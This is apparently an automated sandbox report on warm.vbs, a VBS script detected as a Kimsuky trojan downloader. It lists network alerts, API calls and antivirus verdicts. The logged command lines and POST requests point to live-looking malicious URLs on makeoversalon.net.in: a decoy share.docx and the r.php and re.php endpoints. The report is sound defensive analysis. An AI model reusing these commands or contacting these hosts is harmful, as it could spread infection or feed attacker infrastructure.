popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

warm.vbs

Antivirus
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 May 17, 2024, 10:14 a.m. May 17, 2024, 10:16 a.m.
Size 27.3KB
Type ASCII text, with very long lines, with CRLF line terminators
MD5 75ec9f68a5b62705c115db5119a78134
SHA256 ec9cc1940fe395867f5bab06016920f7194d753ae8cfa331bea0a44ecc8ef7cf
CRC32 620B30B2
ssdeep 384:mrquVS33hr8nIsbSQVwooRmB7+shi14PdSkNk0dRL3K2fJ+QIHBR:mugSBrwIBQVwoI8dSMdBa2fGj
Yara
  • Antivirus - Contains references to security software

Name Response Post-Analysis Lookup
makeoversalon.net.in
A 5.9.123.217
5.9.123.217
IP Address Status Action
117.18.232.200 Active Moloch
164.124.101.2 Active Moloch
5.9.123.217 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49173 -> 5.9.123.217:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49169 -> 5.9.123.217:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49184 -> 117.18.232.200:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49166 -> 5.9.123.217:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49165 -> 5.9.123.217:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49171 -> 5.9.123.217:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49167 -> 5.9.123.217:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49168 -> 5.9.123.217:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49182 -> 117.18.232.200:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 5.9.123.217:443 -> 192.168.56.101:49172 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 5.9.123.217:443 -> 192.168.56.101:49170 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 117.18.232.200:443 -> 192.168.56.101:49186 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 5.9.123.217:443 -> 192.168.56.101:49179 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.101:49177 -> 5.9.123.217:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49176 -> 5.9.123.217:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49183 -> 117.18.232.200:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 117.18.232.200:443 -> 192.168.56.101:49187 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.101:49185 -> 117.18.232.200:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0
request GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml
cmdline cmd.exe /c explorer "https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx"
cmdline "C:\Windows\System32\cmd.exe" /c explorer "https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx"
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: cmd.exe
parameters: /c explorer "https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx"
filepath: cmd.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: ??^3u 1?p??!y?M????W0?<?????r??????(?? ????Rw??b[????Z?2????<?tZ ????\???????????<€)J????i[?i?R#??,??7
parameters:
filepath: ??^3u 1?p??!y?M????W0?<?????r??????(?? ????Rw??b[????Z?2????<?tZ ????\???????????<€)J????i[?i?R#??,??7
0 0

ShellExecuteExW

 show_type: 0
filepath_r: d#??L?0MGR{JY??.??}?
parameters:
filepath: d#??L?0MGR{JY??.??}?
0 0
host 117.18.232.200
Time & API Arguments Status Return Repeated

InternetCrackUrlW

 url: https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/r.php
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 81788928
http_method: POST
referer:
path: /wp-content/plugins/wp-custom-taxonomy-image/iiri/r.php
1 13369356 0

InternetCrackUrlW

 url: https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/re.php
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 81788928
http_method: POST
referer:
path: /wp-content/plugins/wp-custom-taxonomy-image/iiri/re.php
1 13369356 0
Time & API Arguments Status Return Repeated

InternetCrackUrlW

 url: https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/r.php
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 81788928
http_method: POST
referer:
path: /wp-content/plugins/wp-custom-taxonomy-image/iiri/r.php
1 13369356 0

send

 buffer: !
socket: 1012
sent: 1
1 1 0

send

 buffer: wsfF¯cóW3síû¿2ag„óÿh†®*J ;ðhª¤/5 ÀÀÀ À 282ÿmakeoversalon.net.in  
socket: 1152
sent: 124
1 124 0

send

 buffer: !
socket: 1012
sent: 1
1 1 0

send

 buffer: !
socket: 1012
sent: 1
1 1 0

send

 buffer: wsfF¯cÉðò•åšE¾V @Ê2O®zpä9yçM/5 ÀÀÀ À 282ÿmakeoversalon.net.in  
socket: 1152
sent: 124
1 124 0

send

 buffer: !
socket: 1012
sent: 1
1 1 0

send

 buffer: !
socket: 1012
sent: 1
1 1 0

send

 buffer: 51fF¯dPÒAÇK>†JK bƒ €•á‰Â"¥¤†–~  ÿ
socket: 1152
sent: 58
1 58 0

send

 buffer: !
socket: 1012
sent: 1
1 1 0

send

 buffer: !
socket: 1012
sent: 1
1 1 0

InternetCrackUrlW

 url: https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/re.php
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 81788928
http_method: POST
referer:
path: /wp-content/plugins/wp-custom-taxonomy-image/iiri/re.php
1 13369356 0

send

 buffer: !
socket: 1012
sent: 1
1 1 0

send

 buffer: wsfF¯e¶%Ex`~»C–$×´‡QÿtùWŒ>á¹üe/5 ÀÀÀ À 282ÿmakeoversalon.net.in  
socket: 1264
sent: 124
1 124 0

send

 buffer: !
socket: 1012
sent: 1
1 1 0

send

 buffer: !
socket: 1012
sent: 1
1 1 0

send

 buffer: wsfF¯eFUDjcëÇg:Á?Úa Þ4ü~tnß%}I÷5/5 ÀÀÀ À 282ÿmakeoversalon.net.in  
socket: 1264
sent: 124
1 124 0

send

 buffer: !
socket: 1012
sent: 1
1 1 0

send

 buffer: !
socket: 1012
sent: 1
1 1 0

send

 buffer: 51fF¯f;ñsª®Ö£ãвY<aÝe*\È!QÇ4ân  ÿ
socket: 1264
sent: 58
1 58 0

send

 buffer: !
socket: 1012
sent: 1
1 1 0

send

 buffer: !
socket: 1012
sent: 1
1 1 0
parent_process wscript.exe martian_process cmd.exe /c explorer "https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx"
parent_process wscript.exe martian_process ??^3u 1?p??!y?M????W0?<?????r??????(?? ????Rw??b[????Z?2????<?tZ ????\???????????<€)J????i[?i?R#??,??7
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c explorer "https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx"
parent_process wscript.exe martian_process d#??L?0MGR{JY??.??}?
Time & API Arguments Status Return Repeated

CreateProcessInternalW

 thread_identifier: 2772
thread_handle: 0x00000084
process_identifier: 2768
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\explorer.exe
track: 1
command_line: explorer "https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx"
filepath_r: C:\Windows\system32\explorer.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000088
1 1 0
Lionic Trojan.Script.Kimsuky.4!c
ALYac Trojan.Script.Agent
VIPRE VB:Trojan.Kimsuky.A
Arcabit VB:Trojan.Kimsuky.A
Symantec ISB.Downloader!gen407
ESET-NOD32 VBS/Kimsuky.AM
TrendMicro-HouseCall TROJ_FRS.0NA104DU24
Avast Script:SNH-gen [Drp]
Kaspersky HEUR:Trojan.VBS.Kimsuky.gen
BitDefender VB:Trojan.Kimsuky.A
NANO-Antivirus Trojan.Script.Vbs-heuristic.druvzi
MicroWorld-eScan VB:Trojan.Kimsuky.A
Rising Trojan.Kimsuky/VBS!8.13D95 (TOPIS:E0:ye5CWOWNOTJ)
Emsisoft VB:Trojan.Kimsuky.A (B)
DrWeb Trojan.MulDrop27.323
TrendMicro TROJ_FRS.0NA104DU24
FireEye VB:Trojan.Kimsuky.A
Ikarus Trojan.VBS.Kimsuky
Google Detected
Kingsoft Win32.Troj.Undef.a
Microsoft Trojan:VBS/Malgent!MSR
ZoneAlarm HEUR:Trojan.VBS.Kimsuky.gen
GData VB:Trojan.Kimsuky.A
Varist ABRisk.LHNS-4
AhnLab-V3 Downloader/VBS.Agent.SC199562
Tencent Vbs.Trojan.Kimsuky.Dwnw
MAX malware (ai score=84)
Fortinet VBS/Kimusky.AM!tr
AVG Script:SNH-gen [Drp]
alibabacloud Trojan:Win/Kimsuky.AZ
file C:\Windows\System32\cmd.exe